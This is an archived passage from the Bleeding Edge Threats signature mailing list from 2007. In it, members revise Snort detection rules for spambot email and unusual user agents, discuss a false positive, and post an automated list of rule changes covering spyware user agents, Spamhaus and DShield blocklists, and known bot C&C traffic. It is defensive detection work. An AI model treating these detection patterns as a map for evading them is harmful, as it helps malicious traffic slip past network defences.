url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents3 2001865 || BLEEDING-EDGE MALWARE MyWebSearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001867 || BLEEDING-EDGE MALWARE Search Engine 2000 Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001868 || BLEEDING-EDGE MALWARE SureSeeker Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001869 || BLEEDING-EDGE MALWARE Sidesearch Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001870 || BLEEDING-EDGE MALWARE Surfplayer Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001871 || BLEEDING-EDGE MALWARE Target Saver Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents 2001872 || BLEEDING-EDGE MALWARE Visicom Spyware User Agent || url,www.bleedingedgethreats.net/cgi-bin/viewcvs.cgi/?root=Spyware-User-Agents From jonkman at bleedingthreats.net Mon Mar 12 14:50:36 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Mon Mar 12 14:51:04 2007 Subject: [Bleeding-sigs] Mail sigs Message-ID: <45F568BC.30003@bleedingthreats.net> alert tcp !$SMTP_SERVERS any -> !$HOME_NET 25 (msg: "BLEEDING-EDGE POLICY Outbound Multiple Non-SMTP Server Emails"; content:"mail from\:"; nocase; threshold: type threshold, track by_src,count 10, seconds 120; classtype: misc-activity; sid: 2000328; rev:8;) alert tcp !$HOME_NET any -> $HOME_NET 25 (msg: "BLEEDING-EDGE POLICY Inbound Frequent Emails - Possible Spambot Inbound"; content:"mail from\:"; nocase; threshold: type threshold, track by_src,count 10, seconds 60; classtype: misc-activity; sid: 2002087; rev:6;) Modified these from their original form. They had no content match and just a flags:S12. Based on a few suggestions sent in I think this will be more stable and reliable. This will hit only if the bot or malicious host is actually able to try to send mail. Comments welcome. Matt -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From thierry.chich at ac-clermont.fr Mon Mar 12 15:25:52 2007 From: thierry.chich at ac-clermont.fr (Thierry CHICH) Date: Mon Mar 12 15:26:23 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082 In-Reply-To: <45EDAA13.30209@bleedingthreats.net> References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45ED94C3.4090902@bleedingthreats.net> <45EDAA13.30209@bleedingthreats.net> Message-ID: <200703121625.52462.thierry.chich@ac-clermont.fr> Le mardi 6 mars 2007 18:51, vous avez ?crit : > Further thought: How about this: > > > alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE > POLICY Unusual User Agent (Client)"; flow:to_server,established; > content:"User-Agent\: Client|0d 0a|"; nocase; > content:!".microsoft.com|0d 0a|"; nocase; classtype: trojan-activity; > reference:url,doc.bleedingthreats.net/2002082; sid:2002082; rev:7;) > > Posted for testing. > > Matt > It is good for me. There is no more FP. I have tried to find what can emit these messages, but it is not very easy. I have even found it on the LAN I manage. I assume it could be coming from recent installation of MSN, but there is no evidence. Thanks to you, Matt, Thierry From jonkman at bleedingthreats.net Mon Mar 12 15:32:29 2007 From: jonkman at bleedingthreats.net (Matt Jonkman) Date: Mon Mar 12 15:32:53 2007 Subject: [Bleeding-sigs] Re: [Snort-sigs] FP 2002082 In-Reply-To: <200703121625.52462.thierry.chich@ac-clermont.fr> References: <200703051459.28464.thierry.chich@ac-clermont.fr> <45ED94C3.4090902@bleedingthreats.net> <45EDAA13.30209@bleedingthreats.net> <200703121625.52462.thierry.chich@ac-clermont.fr> Message-ID: <45F5728D.8070105@bleedingthreats.net> Glad to hear the falses are gone. it is interesting sometimes what you find emanating from a windows box. :) Sometimes I just sit and watch what's coming from particular workstations on the nets I manage... always find something unexpected. Matt Thierry CHICH wrote: > Le mardi 6 mars 2007 18:51, vous avez ?crit : >> Further thought: How about this: >> >> >> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE >> POLICY Unusual User Agent (Client)"; flow:to_server,established; >> content:"User-Agent\: Client|0d 0a|"; nocase; >> content:!".microsoft.com|0d 0a|"; nocase; classtype: trojan-activity; >> reference:url,doc.bleedingthreats.net/2002082; sid:2002082; rev:7;) >> >> Posted for testing. >> >> Matt >> > > It is good for me. There is no more FP. I have tried to find what can emit > these messages, but it is not very easy. I have even found it on the LAN I > manage. I assume it could be coming from recent installation of MSN, but > there is no evidence. > > Thanks to you, Matt, > > Thierry > -- -------------------------------------------- Matthew Jonkman Bleeding Edge Threats 765-429-0398 765-807-3060 fax http://www.bleedingthreats.net -------------------------------------------- PGP: http://www.bleedingthreats.com/mattjonkman.asc From bleeding at bleedingthreats.net Mon Mar 12 18:00:06 2007 From: bleeding at bleedingthreats.net (bleeding@bleedingthreats.net) Date: Mon Mar 12 18:00:09 2007 Subject: [Bleeding-sigs] Bleeding Edge Threats Daily Signature Changes Message-ID: <20070312180006.4769722C0AB@sb03.us.bleedingsnort.com> [***] Results from Oinkmaster started Mon Mar 12 14:00:05 2007 [***] [///] Modified active rules: [///] 2000328 - BLEEDING-EDGE POLICY Outbound Multiple Non-SMTP Server Emails (bleeding-policy.rules) 2002087 - BLEEDING-EDGE POLICY Inbound Frequent Emails - Possible Spambot Inbound (bleeding-policy.rules) 2400000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2400004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound (bleeding-drop.rules) 2401000 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401001 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401002 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401003 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2401004 - BLEEDING-EDGE DROP Spamhaus DROP Listed Traffic Inbound - BLOCKING SOURCE (bleeding-drop-BLOCK.rules) 2402000 - BLEEDING-EDGE DROP Dshield Block Listed Source (bleeding-dshield.rules) 2403000 - BLEEDING-EDGE DROP Dshield Block Listed Source - BLOCKING (bleeding-dshield-BLOCK.rules) 2404000 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 1) (bleeding-botcc.rules) 2404001 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 2) (bleeding-botcc.rules) 2404002 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 3) (bleeding-botcc.rules) 2404003 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 4) (bleeding-botcc.rules) 2404004 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 5) (bleeding-botcc.rules) 2404005 - BLEEDING-EDGE DROP Known Bot C&C Server Traffic (group 6) (bleeding-botcc.rules) 2405000 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 1) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405001 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 2) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405002 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 3) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405003 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 4) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405004 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 5) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) 2405005 - BLEEDING-EDGE DROP Known Bot C&C Traffic (group 6) - BLOCKING SOURCE (bleeding-botcc-BLOCK.rules) [+++] Added non-rule lines: [+++] -> Added to bleeding-drop-BLOCK.rules (1): # VERSION 120 -> Added to bleeding-drop.rules (1): # VERSION 120 [---] Removed non-rul